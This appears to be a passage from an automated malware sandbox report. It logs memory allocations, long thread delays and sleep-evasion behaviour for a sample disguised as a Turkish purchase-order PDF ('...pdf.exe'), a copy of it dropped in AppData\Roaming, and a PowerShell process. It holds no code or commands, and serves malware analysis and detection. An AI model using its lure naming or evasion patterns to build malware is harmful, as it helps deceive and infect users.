                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 62A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 72A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 74F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 84F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 2CC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1540000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 6A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7A60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7CB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 8CB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: F60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 10C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1310000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 4D60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 6670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 7670000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 78C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 88C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 1200000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMemory allocated: 2B80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399875Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399765Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399656Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399531Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399421Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399312Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399195Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2399093Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398984Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398874Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398765Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398653Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398543Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398432Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398328Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398188Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2398015Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397906Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397796Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397687Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397578Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397468Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397359Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397250Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397140Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2397031Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396922Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396810Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396703Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396594Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396484Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396375Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396265Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396156Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2396046Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395937Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395827Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395714Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395587Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395465Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395358Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395250Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395140Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2395031Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394922Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394812Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394703Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394593Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394483Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeThread delayed: delay time: 2394375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399296Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399187Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399076Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398747Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398560Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398218Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396797Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396684Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396577Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396468Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396244Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396133Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396031Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2400000
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399890
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399778
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399656
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399349
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399224
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2399094
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398984
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398875
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398747
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398625
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398516
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398391
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398266
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2398047
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397828
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397719
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397609
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397500
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397390
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397281
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397172
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2397052
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396594
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396469
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396359
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396250
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396141
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2396031
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395922
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395812
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395703
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395593
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395484
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395375
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395265
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395156
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395042
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394937
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394825
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394718
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394541
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394437
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394328
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394218
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6350Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3321Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWindow / User API: threadDelayed 3072Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exeWindow / User API: threadDelayed 6779Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 4658Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 5193Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 2572
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWindow / User API: threadDelayed 7283
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2400000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7544Thread sleep count: 3072 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7544Thread sleep count: 6779 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399195s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2399093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe TID: 7536Thread sleep time: -2398765s >= -30000sJump to behavior
